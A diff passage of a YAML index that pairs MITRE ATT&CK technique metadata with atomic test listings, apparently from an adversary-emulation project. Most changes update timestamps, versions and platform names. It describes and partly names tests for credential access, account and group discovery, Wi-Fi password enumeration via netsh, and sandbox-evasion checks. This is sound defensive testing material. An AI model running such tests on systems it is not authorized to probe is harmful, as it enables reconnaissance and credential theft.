+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests:
     - name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -98399,7 +99119,7 @@ credential-access:
         elevation_required: true
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -98456,9 +99176,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests:
     - name: List All Secrets
@@ -98613,7 +99332,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -98637,8 +99356,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -98703,7 +99420,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests:
     - name: System Owner/User Discovery
@@ -98837,7 +99553,7 @@ discovery:
           '
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -98896,7 +99612,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests:
     - name: Docker Container and Resource Discovery
@@ -98985,7 +99700,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -99006,8 +99721,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests:
     - name: Check internet connection using ping Windows
@@ -99111,7 +99824,7 @@ discovery:
           '
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -99134,15 +99847,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -99168,13 +99880,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -99199,12 +99910,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -99246,13 +99956,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -99313,7 +100022,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests:
     - name: Display group policy information via gpresult
@@ -99404,7 +100112,7 @@ discovery:
         elevation_required: true
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -99468,7 +100176,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests:
     - name: Device Driver Discovery
@@ -99490,14 +100197,14 @@ discovery:
         elevation_required: false
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -99544,7 +100251,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests:
     - name: Enumerate all accounts (Domain)
@@ -100195,7 +100901,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests:
     - name: Enumerate all accounts (Local)
@@ -100394,7 +101099,7 @@ discovery:
         name: command_prompt
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -100484,13 +101189,12 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests:
     - name: Detect Virtualization Environment (Linux)
@@ -100574,7 +101278,7 @@ discovery:
           if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -100617,7 +101321,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests:
     - name: Basic Permission Groups Discovery Windows (Domain)
@@ -100963,7 +101666,7 @@ discovery:
         name: sh
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -101004,7 +101707,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests:
     - name: System Service Discovery
@@ -101067,7 +101769,7 @@ discovery:
         command: powershell.exe Get-Service
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -101152,7 +101854,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests:
     - name: Packet Capture Linux using tshark or tcpdump
@@ -101728,7 +102429,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests:
     - name: Network Share Discovery
@@ -102000,7 +102700,7 @@ discovery:
         elevation_required: false
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -102051,7 +102751,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests:
     - name: Win32_PnPEntity Hardware Inventory
@@ -102102,7 +102801,7 @@ discovery:
           '
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -102113,7 +102812,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -102128,7 +102826,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -102176,7 +102873,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests:
     - name: System Information Discovery
@@ -102901,7 +103599,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests:
     - name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
@@ -102916,7 +103613,7 @@ discovery:
         elevation_required: false
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -102958,12 +103655,11 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests:
     - name: List Process Main Windows - C# .NET
@@ -103005,112 +103701,64 @@ discovery:
         name: command_prompt
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -103125,6 +103773,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -103134,9 +103788,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -103146,8 +103805,44 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
